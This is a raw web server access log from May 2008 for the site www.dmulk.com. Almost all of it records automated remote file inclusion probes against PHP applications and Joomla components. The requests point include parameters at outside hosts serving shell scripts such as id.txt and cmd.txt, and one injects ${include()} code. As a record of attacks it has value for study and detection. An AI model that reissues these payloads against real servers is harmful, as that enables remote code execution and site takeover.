211.62.35.166 - - [19/May/2008:09:29:56 -0700] "GET /logs/show.php?file=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
211.62.35.166 - - [19/May/2008:09:29:56 -0700] "GET /show.php?file=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:29:57 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.230.148.86 - - [19/May/2008:09:30:13 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.230.148.86 - - [19/May/2008:09:30:13 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:30:18 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET /logs/access_071224.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET /logs/access_071224.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET /logs/access_071224.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:25 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:26 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:26 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:26 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:30 -0700] "GET /logs/access_071224.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:30 -0700] "GET //zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:30:30 -0700] "GET /logs//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:30:46 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:30:49 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:30:51 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.187.25.20 - - [19/May/2008:09:30:52 -0700] "GET /logs/index.php?root=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:30:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
150.187.25.20 - - [19/May/2008:09:30:56 -0700] "GET /index.php?root=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:10 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:10 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:10 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:12 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:12 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:12 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:13 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:13 -0700] "GET //Neos_Chronos/header.php?base_folder=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:13 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:31:21 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:31:21 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:31:22 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:26 -0700] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:27 -0700] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:31:28 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:31:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:31:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:31:29 -0700] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:31:31 -0700] "GET /logs/access_071225.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:31:45 -0700] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:31:50 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:09:31:50 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:32:05 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:32:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:32:16 -0700] "GET /logs/access_071225.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:32:16 -0700] "GET /logs/access_071225.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:32:16 -0700] "GET /logs/access_071225.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:32:16 -0700] "GET /logs/access_071225.log//zero_vote/error.php?dir=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.187.25.20 - - [19/May/2008:09:32:31 -0700] "GET /logs/index.php?root=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [19/May/2008:09:32:34 -0700] "GET /index.php?root=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:32:55 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.252.7 - - [19/May/2008:09:32:55 -0700] "GET /logs/access.log/inc/cmses/aedatingCMS.php?dir[inc]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:06 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:07 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.252.7 - - [19/May/2008:09:33:09 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:17 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:17 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:17 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:20 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:23 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:33:28 -0700] "GET /logs/access_071230.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:33:34 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:33:34 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:09:33:37 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:33:39 -0700] "GET /logs/access.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:33:39 -0700] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:33:39 -0700] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:33:40 -0700] "GET /logs/access_071126.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:33:40 -0700] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:33:41 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:33:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:33:42 -0700] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:33:42 -0700] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:33:42 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:33:42 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:09:33:43 -0700] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:33:49 -0700] "GET /config.php?path_to_root=http://www.avedila.com/avedila/.../bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
200.75.40.78 - - [19/May/2008:09:33:50 -0700] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.75.40.78 - - [19/May/2008:09:33:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.75.40.78 - - [19/May/2008:09:33:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:34:21 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:34:21 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:34:29 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.125 - - [19/May/2008:09:34:53 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.114.133.81 - - [19/May/2008:09:34:54 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.125 - - [19/May/2008:09:34:59 -0700] "GET /logs/access_080213.log/joomla/index.php?option=com_restaurante&task=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:35:00 -0700] "GET /logs/access_080313.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:35:00 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:35:01 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:09:35:21 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:35:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:35:28 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
210.203.73.105 - - [19/May/2008:09:35:31 -0700] "GET /logs//citywriter/head.php?path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [19/May/2008:09:35:32 -0700] "GET //citywriter/head.php?path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.53.226 - - [19/May/2008:09:35:35 -0700] "GET /logs/access_080327.log//modules/Forums/admin/index.php?phpbb_root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:35:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:35:37 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
65.55.211.40 - - [19/May/2008:09:35:49 -0700] "GET /bikes/cb750K6/?N=D HTTP/1.1" 200 1626 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:35:55 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:35:56 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:35:57 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:36:07 -0700] "GET /logs/config.php?path_to_root=http://www.avedila.com/avedila/.../bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:36:11 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:36:11 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:36:14 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:36:14 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:36:14 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:09:36:14 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:36:19 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
209.62.80.134 - - [19/May/2008:09:36:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
